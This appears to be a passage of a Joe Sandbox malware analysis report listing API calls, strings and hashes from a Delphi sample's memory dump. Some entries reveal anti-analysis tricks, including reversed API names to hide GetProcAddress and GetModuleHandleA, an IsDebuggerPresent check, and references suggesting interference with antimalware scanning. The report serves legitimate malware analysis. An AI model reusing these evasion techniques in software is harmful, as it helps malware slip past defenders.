                                                                                                                  • Instruction Fuzzy Hash: 04A1D230A042B88BDF21AA2CCC84B99B7E5EF09350F9441F5ED49AB386CB7599C5CF51
                                                                                                                  Strings
                                                                                                                  • The unexpected small block leaks are:, xrefs: 02B12707
                                                                                                                  • , xrefs: 02B12814
                                                                                                                  • Unexpected Memory Leak, xrefs: 02B128C0
                                                                                                                  • 7, xrefs: 02B126A1
                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B12849
                                                                                                                  • bytes: , xrefs: 02B1275D
                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 02B12690
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                  • API String ID: 0-2723507874
                                                                                                                  • Opcode ID: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                  • Instruction ID: bae71f51e1f4e8534cbb57ed49cab5ffccd1a85b2b893d872a0a95acdb38912b
                                                                                                                  • Opcode Fuzzy Hash: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                  • Instruction Fuzzy Hash: C571B130A042B88FDF21EA2CCC84BD9BAE5EF09744F9041E5D949EB285DB758AC5CF51
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1BDF6
                                                                                                                    • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                  • Opcode ID: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                  • Instruction ID: d14148c337e30014d83076611864d3586be67db5fcd1728b496b6ca07752be80
                                                                                                                  • Opcode Fuzzy Hash: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                  • Instruction Fuzzy Hash: EA612135B401489BDB00EBA4D894B9F7BBBDF88700FD098F6E1019B645DA39EA06DF51
                                                                                                                  APIs
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B000
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B2B017
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B0AB
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B2B0B7
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B2B0CB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Read$HandleModule
                                                                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                                                                  • API String ID: 2226866862-113032527
                                                                                                                  • Opcode ID: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                  • Instruction ID: f155cd0650f8b316ac0a53285981359ab5518f0d306c32bfe56e2cbf3bc9e26f
                                                                                                                  • Opcode Fuzzy Hash: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                  • Instruction Fuzzy Hash: 60317671A40315BBDB21DB68CC85F9E77A8FF05358F044691FA68D72C1DB34A948CBA4
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B14395
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B1439B
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8), ref: 02B143B0
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?), ref: 02B143B6
                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B143D4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B1AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                    • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                    • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                    • Part of subcall function 02B1AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                  • CharToOemA.USER32(?,?), ref: 02B1AEFB
                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF18
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF1E
                                                                                                                  • GetStdHandle.KERNEL32(000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF33
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF39
                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B1AF5B
                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B1AF71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 185507032-0
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E625
                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E641
                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B1E67A
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E6F7
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B1E710
                                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 02B1E745
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 351091851-0
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135BA
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135ED
                                                                                                                  • RegCloseKey.ADVAPI32(?,02B13610,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B13603
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                  • API String ID: 667068680-1372893251
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA68
                                                                                                                    • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA98
                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B1AAA3
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B1AAE7,?,?,00000000), ref: 02B1AAC1
                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B1AACC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4102113445-0
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02B1ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B1AB2F
                                                                                                                    • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc
                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                  • API String ID: 1883125708-1952140341
                                                                                                                  • Opcode ID: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                  • Instruction ID: bf39e8ac72baaec92e9f5b566a9fd28435be79624ed916c4835548d209982002
                                                                                                                  • Opcode Fuzzy Hash: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                  • Instruction Fuzzy Hash: C4F096B1A54704AFEB00EFB4DD01959F7FDE749740B9188E0F804D3620DA34AE149D35
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                                                                  • API String ID: 1646373207-2367923768
                                                                                                                  • Opcode ID: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                  • Instruction ID: b5e4208da862008e53740efd043c4439ae8ff575a47f249ff175a983b3f320e3
                                                                                                                  • Opcode Fuzzy Hash: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                  • Instruction Fuzzy Hash: 4AD012B17513601DBE0076F41CC482A239C875452D3300EE0B02AC64B2E5A6881D5114
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B3D10B,00000000,02B3D11E), ref: 02B1C47A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B1C48B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                  • Opcode ID: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                  • Instruction ID: ac9472e1a6448b30edc75d30d8db5b240ac2be4fefd152415510da4d9d44e1e9
                                                                                                                  • Opcode Fuzzy Hash: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                  • Instruction Fuzzy Hash: 43D05EA0EC83445EF600AAB2548263A2B98CB08350B8848E7F40247104E773E4108F5A
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E297
                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E2B3
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E32A
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 02B1E353
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 920484758-0
                                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                  • Instruction ID: 5b190c14df617428032a2f44cba9ca7e7b247a1af6a815ce07d1fd8903bd5442
                                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                  • Instruction Fuzzy Hash: 2E410A75A012299FCB66DB58CC94BC9B3BDEF49314F4041D5E948A7211DA34EF808FA4
                                                                                                                  APIs
                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                  • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3990497365-0
                                                                                                                  • Opcode ID: f80ba9a055bc628a19fcf184b2e3ad0d4bab5f63ce49c8e5afdb00894d60b3d9
                                                                                                                  • Instruction ID: 47c189bd0a31b12f63b9cbac55c2c94ece64e62810baaa38ae4933a5ca1c9080
                                                                                                                  • Opcode Fuzzy Hash: f80ba9a055bc628a19fcf184b2e3ad0d4bab5f63ce49c8e5afdb00894d60b3d9
                                                                                                                  • Instruction Fuzzy Hash: 9D414971A012589FDB21EB68CD84BDAB7FDAB08340F9400EAE548E7245DB74AF84CF50
                                                                                                                  APIs
                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                  • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3990497365-0
                                                                                                                  • Opcode ID: 30d619722148db5de874bf34792b0a3791fdfec9b600061eca06d76ecc9eaef9
                                                                                                                  • Instruction ID: 0d3e5164f8552e9969a842f4c2fb6a988e779d8635d42459ea63c614692bfbff
                                                                                                                  • Opcode Fuzzy Hash: 30d619722148db5de874bf34792b0a3791fdfec9b600061eca06d76ecc9eaef9
                                                                                                                  • Instruction Fuzzy Hash: D7415A71A012589FDB21EB68CD84BDAB7FDAB08340F9400E6E548E7241DB74AF84CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                  • Instruction ID: 95a2c0ca5b1a6ae30791099c0ebec8e30aef967f8a9290670022a8f0b22fa17b
                                                                                                                  • Opcode Fuzzy Hash: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                  • Instruction Fuzzy Hash: 2CA1F9777306040BD718AA7C9D803BDB3D6DBC5265F9882BED31DCB385EB68C9528650
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19572
                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19578
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                  • String ID: yyyy
                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                  • Opcode ID: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                  • Instruction ID: 8676353fc7cd72329d1871b5d1e38ff6baba3b5ab980d0207943815eea3dd7c6
                                                                                                                  • Opcode Fuzzy Hash: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                  • Instruction Fuzzy Hash: D2217C71A006989FDB10DFA8C891AAEB7B9EF09700F9104E5E905E7251DB30DE40CBA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
